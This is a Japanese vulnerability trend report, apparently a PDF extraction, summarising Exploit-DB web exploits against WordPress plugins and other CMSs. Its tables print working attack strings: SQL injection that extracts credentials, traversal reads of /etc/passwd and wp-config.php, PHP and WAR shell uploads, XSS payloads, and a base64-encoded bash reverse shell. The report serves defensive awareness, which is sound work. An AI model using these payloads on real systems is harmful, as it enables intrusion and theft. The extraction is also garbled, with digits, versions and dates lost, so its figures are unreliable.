5.4
EDB-Report 最新Web脆弱性トレンドレポート(5.4) 5.4.~5.4.3 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム サマリー 5年4月は Exploit-DBの分析結果をみると SQLインジェクション攻撃による脆弱性が最も多く報告されました そのSQLインジェクション攻撃のほとんどは CMSから発見されました CMSは SQLインジェクション攻撃だけではなく クロス サイト スクリプティング(Cross Site Scripting;XSS)攻撃や ファイルアップロード(File Upload)といった様々な脆弱性が多数発見され 今月に脆弱性が最 も多く報告されたソフトウェアとなっています における脆弱性のほとんどがPluginにて発生しているため のご利用の管理者は 脆弱性の診断やPluginのアップデートを定期的に行い セキュ リティを維持しなければなりません また のソフトウェアからも件の脆弱性が発見されました 当該の脆弱性は ソースコードによるものであり 単純な攻撃パターンだけでも悪用可能です 難易度は易し いレベルであっても 莫大な被害を及ぼす可能性があるため 特別な注意が必要です. 脆弱性別 脆弱性カテゴリ コマンドインジェクション (Command Injection) ファイルアップロード File Upload) クロス サイト スクリプティング Cross Site Scripting:XSS ローカルファイル挿入 Local File Inclusion:LFI SQL インジェクション SQL Injection 9 脆弱性別 3 4 4 3 9 危険度 割合 早急対応要 48% 高 7 5% % % 8 4 8 4 危険度別分類. 危険度別 早急対応要 高 7 3. 攻撃実行の難易度別 難易度 割合 難 8% 9 7% 易 8 55% % 攻撃実行の難易度別 難 8 易 9 4. 主なソフトウェア別脆弱性発生 ソフトウェア名 主なソフトウェア別脆弱性発生 Ericsson phpsfp Balero BlueDragon CFChart Servlet Wolf 5 5 5 Ericsson phpsfp Copyright 5 Penta Security Systems Inc. All rights reserved Balero BlueDragon CFChart Servlet Wolf
EDB-Report 最 新 Web トレンドレポート(5.4) 5.4.~5.4.3 Exploit-DB(http://exploit-db.com)より 公 開 されている 内 容 に 基 づいた トレンド 情 報 です 危 険 度 分 類 基 準 早 急 対 応 要 : 攻 撃 が 成 功 した 場 合 システムへ 侵 入 可 高 :システム 情 報 を 取 得 するか あるいはクライアントに 次 被 害 を 及 ぼす : 情 報 漏 洩 攻 撃 実 行 難 易 度 分 類 基 準 難 : 複 数 の を 突 いた 攻 撃 パターン 対 象 のシステムの 重 要 な 情 報 を 取 得 するため 高 度 な 攻 撃 コードを 採 用 したパターン 知 らされていない 攻 撃 コードを 採 用 したパターンのいずれかに 該 当 する : 攻 撃 手 法 自 体 は 難 しくないが 迂 回 コードを 採 用 したパターン 易 : 回 のリクエストで 攻 撃 が 成 立 するパターン 複 数 回 トライするも 既 知 の 攻 撃 コードを 採 用 したパターンのいずれかに 該 当 する ** 5 件 以 上 発 生 した 主 なソフトウェア 別 の 詳 細 情 報 EDB 番 号 カテゴリ 攻 撃 難 易 度 危 険 度 名 ソフトウェア 名 34 File Upload 易 早 急 対 応 要 Simple Ads Manager.5.94 - sam-ajax-admin.php File Upload SQL Injection 易 高 Simple Ads Manager Plugin - sam-ajax.php SQL Injection SQL Injection 易 高 Simple Ads Manager Plugin - /sam-ajax-admin.php SQL Injection 3 SQL Injection 難 早 急 対 応 要 Business Intelligence Plugin - view.php SQL Injection 377 SQL Injection 早 急 対 応 要 Traffic Analyzer Plugin 3.4. - / SQL Injection 37 SQL Injection 早 急 対 応 要 All In One WP Security & Firewall 3.9. - admin.php SQL Injection 39 File Upload 易 早 急 対 応 要 Windows Desktop and iphone Photo Uploader Plugin - upload.php File Upload 3735 SQL Injection 早 急 対 応 要 Duplicator <=.5.4 - admin-ajax.php SQL Injection 37 LFI 易 高 Plugin 'WP Mobile Edition'.7 - css.php LFI 37 XSS 易 高 MiwoFTP Plugin..5 - admin.php XSS 375 SQL Injection 易 高 Video Gallery.8 - admin-ajax.php SQL Injection 脆 弱 性 37 LFI 易 高 MiwoFTP Plugin..5 - admin.php LFI 3777 SQL Injection 高 Ajax Store Locator. - admin-ajax.php SQL Injection 385 SQL Injection 易 高 Community Events Plugin.3.5 - / SQL Injection 脆 弱 性 38 SQL Injection 難 早 急 対 応 要 Tune Library Plugin.5.4 - / SQL Injection 38 SQL Injection 早 急 対 応 要 NEX-Forms < 3. - admin-ajax.php SQL Injection 脆 弱 性 384 SQL Injection 易 高 Ultimate Product Catalogue Plugin - / SQL Injection 脆 383 SQL Injection 易 高 Ultimate Product Catalogue Plugin - admin-ajax.php SQL Injection 38 LFI 易 早 急 対 応 要 TheCartPress Plugin.3.9 - admin.php LFI 38 XSS 易 高 TheCartPress Plugin.3.9 - /shopping-cart/checkout/ XSS 38 XSS 易 高 TheCartPress Plugin.3.9 - admin.php XSS Copyright 5 Penta Security Systems Inc. All rights reserved
日 付 EDB 番 号 カテゴリ 攻 撃 難 易 度 危 険 度 名 攻 撃 コード 対 象 プログラム 対 象 環 境 5-4- 39 LFI 早 急 対 応 要 5-4- 3 SQL Injection 難 早 急 対 応 要 5-4- 34 File Upload 易 早 急 対 応 要 EDB-Report 最 新 Web トレンドレポート(5.4) 5.4.~5.4.3 Exploit-DB(http://exploit-db.com)より 公 開 されている 内 容 に 基 づいた トレンド 情 報 です Ericsson Drutt MSDP (Instance Monitor) - / LFI phpsfp Schedule Facebook Posts.5. - /index.php/login SQL Injection Simple Ads Manager.5.94 - sam-ajax-admin.php File Upload /..%f..%f..%f..%f..%f..%f..%f..%f..%f..%f..%f..%fetc/passwd GET /index.php/login HTTP/. Cookie: login= ' or extractvalue(rand(),concat(xe,(select concat_ws(x3a,username,password) from users limit ))) or ' POST /wp-content/plugins/simple-ads-manager/sam-ajaxadmin.php HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5. (compatible; MSIE.; Windows NT.; WOW4; Trident/.) Content-Type: multipart/form-data; boundary=-------------- -------------7dd998f -----------------------------7dd998f Content-Disposition: form-data; name="uploadfile"; filename="info.php" Content-Type: application/octet-stream Ericsson phpsfp Ericsson Drutt MSDP (Instance Monitor) phpsfp - Schedule Facebook Posts.5. plugin Simple Ads Manager.5.94 5-4- SQL Injection 易 高 Simple Ads Manager Plugin - sam-ajax.php SQL Injection <? phpinfo();?> -----------------------------7dd998f-- POST /wp-content/plugins/simple-ads-manager/samajax.php HTTP/. User-Agent: Mozilla/5. Windows NT.; WOW4 Chrome/..9.75 Safari/535.7 plugin Simple Ads Manager.5.94 and.5.9 5-4- SQL Injection 易 高 Simple Ads Manager Plugin - /sam-ajax-admin.php SQL Injection action=sam_hits&hits%5b%5d%5b%5d= and =&hits%5b%5d%5b%5d= and =&hits%5b%5d%5b%5d= and =&level=3 POST/wp-content/plugins/simple-ads-manager/sam-ajaxadmin.php HTTP/. User-Agent: Mozilla/5. Windows NT.; WOW4 Chrome/..9.75 Safari/535.7 plugin Simple Ads Manager.5.94 and.5.9 5-4- 3 SQL Injection 難 早 急 対 応 要 5-4- 3 SQL Injection 難 早 急 対 応 要 5-4-5 34 SQL Injection 難 早 急 対 応 要 5-4-8 378 LFI 易 早 急 対 応 要 5-4-8 377 SQL Injection 早 急 対 応 要 5-4-8 375 SQL Injection 高 Spider Random Article Componen - index.php SQL Injection Business Intelligence Plugin - view.php SQL Injection - adsearch.php SQL Injection Configuration Management.3. - /zenworks/uploadservlet LFI 脆 Traffic Analyzer Plugin 3.4. - / SQL Injection 脆 Balero CMS.7. - /balerocms/admin/edit_page/m od-virtual_page/id-sql Injection action=load_posts&cstr= and =&sp=post&spg=page /index.php?option=com_rand&catid=%7%and(sele ct%%from(select%count(*),concat((select% (select%concat(database(),x7,x7e))%from% information_schema.tables%limit%,),floor(ra nd()*))x%from%information_schema.tables% GROUP%BY%x)a)--%- &limit=&style=&view=articles&format=raw&itemid=3 /wp-content/plugins/wp-business-intelligence/view.php?t=7+union+select+,,3,group_concat(table_name), 5,,7,8,9,,+from+information_schema.tables+where +table_schema=database()--% /adsearch.php=action=search&buyitnow=y&buyitnowonly =y&category=%and%= POST /zenworks/uploadservlet?uid=../../../opt/novell/zenworks /share/tomcat/webapps/&filename=payload.war HTTP/. User-Agent: Mozilla/5. Windows NT.; WOW4 Chrome/..9.75 Safari/535.7 GET / HTTP/. x.x.x.x Referer: BLAH' (SELECT 'Fdsf' FROM DUAL WHERE 5435=5435 and SLEEP(3) ) ' POST /balerocms/admin/edit_page/mod-virtual_page/id- HTTP/. User-Agent: Mozilla/5. Windows NT.; WOW4 Chrome/..9.75 Safari/535.7 Spider Random Article Component Business Intelligence Plugin Configuration Management.3. Traffic Analyzer Plugin 3.4. Balero Balero CMS.7. 5-4-8 374 XSS 高 7...3 - adminajax.php XSS id=' and benchmark (5,sha())-- POST/wordpress-install/wp-admin/admin-ajax.php HTTP/. User-Agent: Mozilla/5. Windows NT.; WOW4 Chrome/..9.75 Safari/535.7 7...3 5-4-8 37 SQL Injection 早 急 対 応 要 All In One WP Security & Firewall 3.9. - admin.php SQL Injection location[id]='><script>alert(string.fromcharcode(88,83,8 3));</script> /wpadmin/admin.php?page=aiowpsec&tab=tab3&orderby=u ser_id,(select * from (select(sleep(3)))a)&order=asc All In One WP Security & Firewall 3.9. Copyright 5 Penta Security Systems Inc. All rights reserved
EDB-Report 最 新 Web トレンドレポート(5.4) 5.4.~5.4.3 Exploit-DB(http://exploit-db.com)より 公 開 されている 内 容 に 基 づいた トレンド 情 報 です 日 付 EDB 番 号 カテゴリ 攻 撃 難 易 度 危 険 度 名 攻 撃 コード 対 象 プログラム 対 象 環 境 5-4-9 39 File Upload 易 早 急 対 応 要 Windows Desktop and iphone Photo Uploader Plugin - upload.php File Upload POST /wordpress/wp-content/plugins/i-dump-iphone-towordpress-photo-uploader/uploader.php HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5. (compatible; MSIE.; Windows NT.; WOW4; Trident/.) Content-Type: multipart/form-data; boundary=-------------- -------------7dd998f -----------------------------7dd998f Content-Disposition: form-data; name="uploadfile"; filename="file.php" Content-Type: application/octet-stream <? phpinfo();?> -----------------------------7dd998f-- Windows Desktop and iphone Photo Uploader Plugin 5-4-3 3735 SQL Injection 早 急 対 応 要 Duplicator <=.5.4 - admin-ajax.php SQL Injection POST /wp-admin/adminajax.php?action=duplicator_package_delete HTTP/. User-Agent: Mozilla/5. Windows NT.; WOW4 Chrome/..9.75 Safari/535.7 Duplicator <=.5.4 duplicator_delid= and (select * from (select(sleep()))a) 5-4-3 37 LFI 易 高 5-4-4 37 XSS 易 高 5-4-4 375 SQL Injection 易 高 5-4-4 37 LFI 易 高 Plugin 'WP Mobile Edition'.7 - css.php LFI MiwoFTP Plugin..5 - admin.php XSS Video Gallery.8 - admin-ajax.php SQL Injection 脆 MiwoFTP Plugin..5 - admin.php LFI /wp-content/themes/mtheme- Unus/css/css.php?files=../../../../wp-config.php /wordpress/wpadmin/admin.php?page=miwoftp&option=com_miwoftp &action=list&dir=wpcontent"><script>alert()</script>&order=name&srt=yes /wp-admin/admin- ajax.php?action=googleadsense&vid=%and%=- - POST /wordpress/wpadmin/admin.php?page=miwoftp&option=com_miwoftp &action=post HTTP/. User-Agent: Mozilla/5. Windows NT.; WOW4 Chrome/..9.75 Safari/535.7 Plugin 'WP Mobile Edition'.7 MiwoFTP Plugin..5 Video Gallery.8 MiwoFTP Plugin..5 5-4- 3777 SQL Injection 高 5-4- 385 LFI 易 高 5-4- 385 SQL Injection 易 高 5-4- 38 SQL Injection 難 早 急 対 応 要 Ajax Store Locator. - admin-ajax.php SQL Injection BlueDragon CFChart Servlet 7...7759 - /cfchart.cfchart LFI Community Events Plugin.3.5 - / SQL Injection 脆 Tune Library Plugin.5.4 - / SQL Injection do_action=delete&first=y&selitems[]=../../../../../pls_mr_ja iler_dont_deleteme.txt /wordpress/wp-admin/adminajax.php?action=sl_dal_searchlocation&funmethod=sear chstore&location=social&storelocation=~ AND (SELECT * FROM (SELECT(SLEEP()))LCKZ) /cfchart.cfchart?..\..\..\..\..\..\..\..\..\..\index.p hp /?page_id=&eventyear=5 AND = )-- &dateset=on&eventday= /?page_id=&artistletter=g' UNION ALL SELECT CONCAT_WS(CHAR(59),version(),current_user(),databas e()),--% 5-4- 38 SQL Injection 早 急 対 応 要 NEX-Forms < 3. - admin-ajax.php SQL Injection 脆 /wordpress/wp-admin/adminajax.php?action=submit_nex_form&nex_forms_id= AND (SELECT * FROM (SELECT(SLEEP()))NdbE) 5-4- 387 SQL Injection 易 高 3.3-488 - /go_login/validate_credentials/admin/%7%or%% /go_login/validate_credentials/a 7%7%3D%7 dmin/ SQL Injection 5-4- 387 Command Injection 難 早 急 対 応 要 5-4- 388 File Upload 易 高 3.3-488 - /index.php/go_site/cpanel/ Command Injection Wolf CMS.8. - /admin/login/login File Upload /index.php/go_site/cpanel/ bash -c "eval \`echo YmFzaCAtaSA+JiAvZGVL3RjcC8xOTIuMTY4LjAuMTEvN DQNCAwPiYx base4 --decode\`" POST /admin/login/login HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5. (compatible; MSIE.; Windows NT.; WOW4; Trident/.) Content-Type: multipart/form-data; boundary=-------------- -------------7dd998f -----------------------------7dd998f Content-Disposition: form-data; name="upload_file"; filename="shell.php" Content-Type: application/octet-stream BlueDragon CFChart Servlet Ajax Store Locator. BlueDragon CFChart Servlet 7...7759 Community Events Plugin.3.5 Tune Library Plugin.5.4 NEX- Forms < 3. 3.3-488 3.3-488 Wolf Wolf CMS.8. 5-4-3 384 SQL Injection 易 高 Ultimate Product Catalogue Plugin - / SQL Injection <? phpinfo();?> -----------------------------7dd998f-- /?SingleProduct='+and+'a'='a Ultimate Product Catalogue Plugin Copyright 5 Penta Security Systems Inc. All rights reserved
EDB-Report 最 新 Web トレンドレポート(5.4) 5.4.~5.4.3 Exploit-DB(http://exploit-db.com)より 公 開 されている 内 容 に 基 づいた トレンド 情 報 です 日 付 EDB 番 号 カテゴリ 攻 撃 難 易 度 危 険 度 名 攻 撃 コード 対 象 プログラム 対 象 環 境 5-4-3 383 SQL Injection 易 高 Ultimate Product Catalogue Plugin - adminajax.php SQL Injection POST /wp-admin/admin-ajax.php HTTP/. User-Agent: Mozilla/5. Windows NT.; WOW4 Chrome/..9.75 Safari/535.7 Ultimate Product Catalogue Plugin 5-4-9 38 SQL Injection 早 急 対 応 要 5-4-9 38 LFI 易 早 急 対 応 要 OS Solution OSProperty.8. - index.php SQL Injection TheCartPress Plugin.3.9 - admin.php LFI Item_ID= AND SLEEP(5)&action=record_view /index.php?option=com_osproperty&no_html=&tmpl=c omponent&task=ajax_loadstateinlistpage&country_id=3 ' UNION ALL SELECT NULL,CONCAT(x7a77,x797774584a4b49547 4d,x7777)# POST /wpadmin/admin.php?page=checkout_editor_settings HTTP/. User-Agent: Mozilla/5. Windows NT.; WOW4 Chrome/..9.75 Safari/535.7 OS Solution OSProperty.8. TheCartPress Plugin.3.9 5-4-9 38 XSS 易 高 tcp_save_fields=&tcp_box_path=../../../../../etc/passwd POST /shopping-cart/checkout/ HTTP/. User-Agent: Mozilla/5. Windows NT.; WOW4 TheCartPress Plugin Chrome/..9.75 Safari/535.7.3.9 - /shopping-cart/checkout/ XSS TheCartPress Plugin.3.9 5-4-9 38 XSS 易 高 TheCartPress Plugin.3.9 - admin.php XSS selected_billing_id=&selected_billing_address=new&billi ng_firstname="><script>alert(/immuniweb/);</script> /wpadmin/admin.php?page=thecartpress/admin/addresseslis t.php&search_by=-- %3E%%7%%3E%3Cscript%3Ealert%8%7immu niweb%7%9;%3c/script%3e TheCartPress Plugin.3.9 Copyright 5 Penta Security Systems Inc. All rights reserved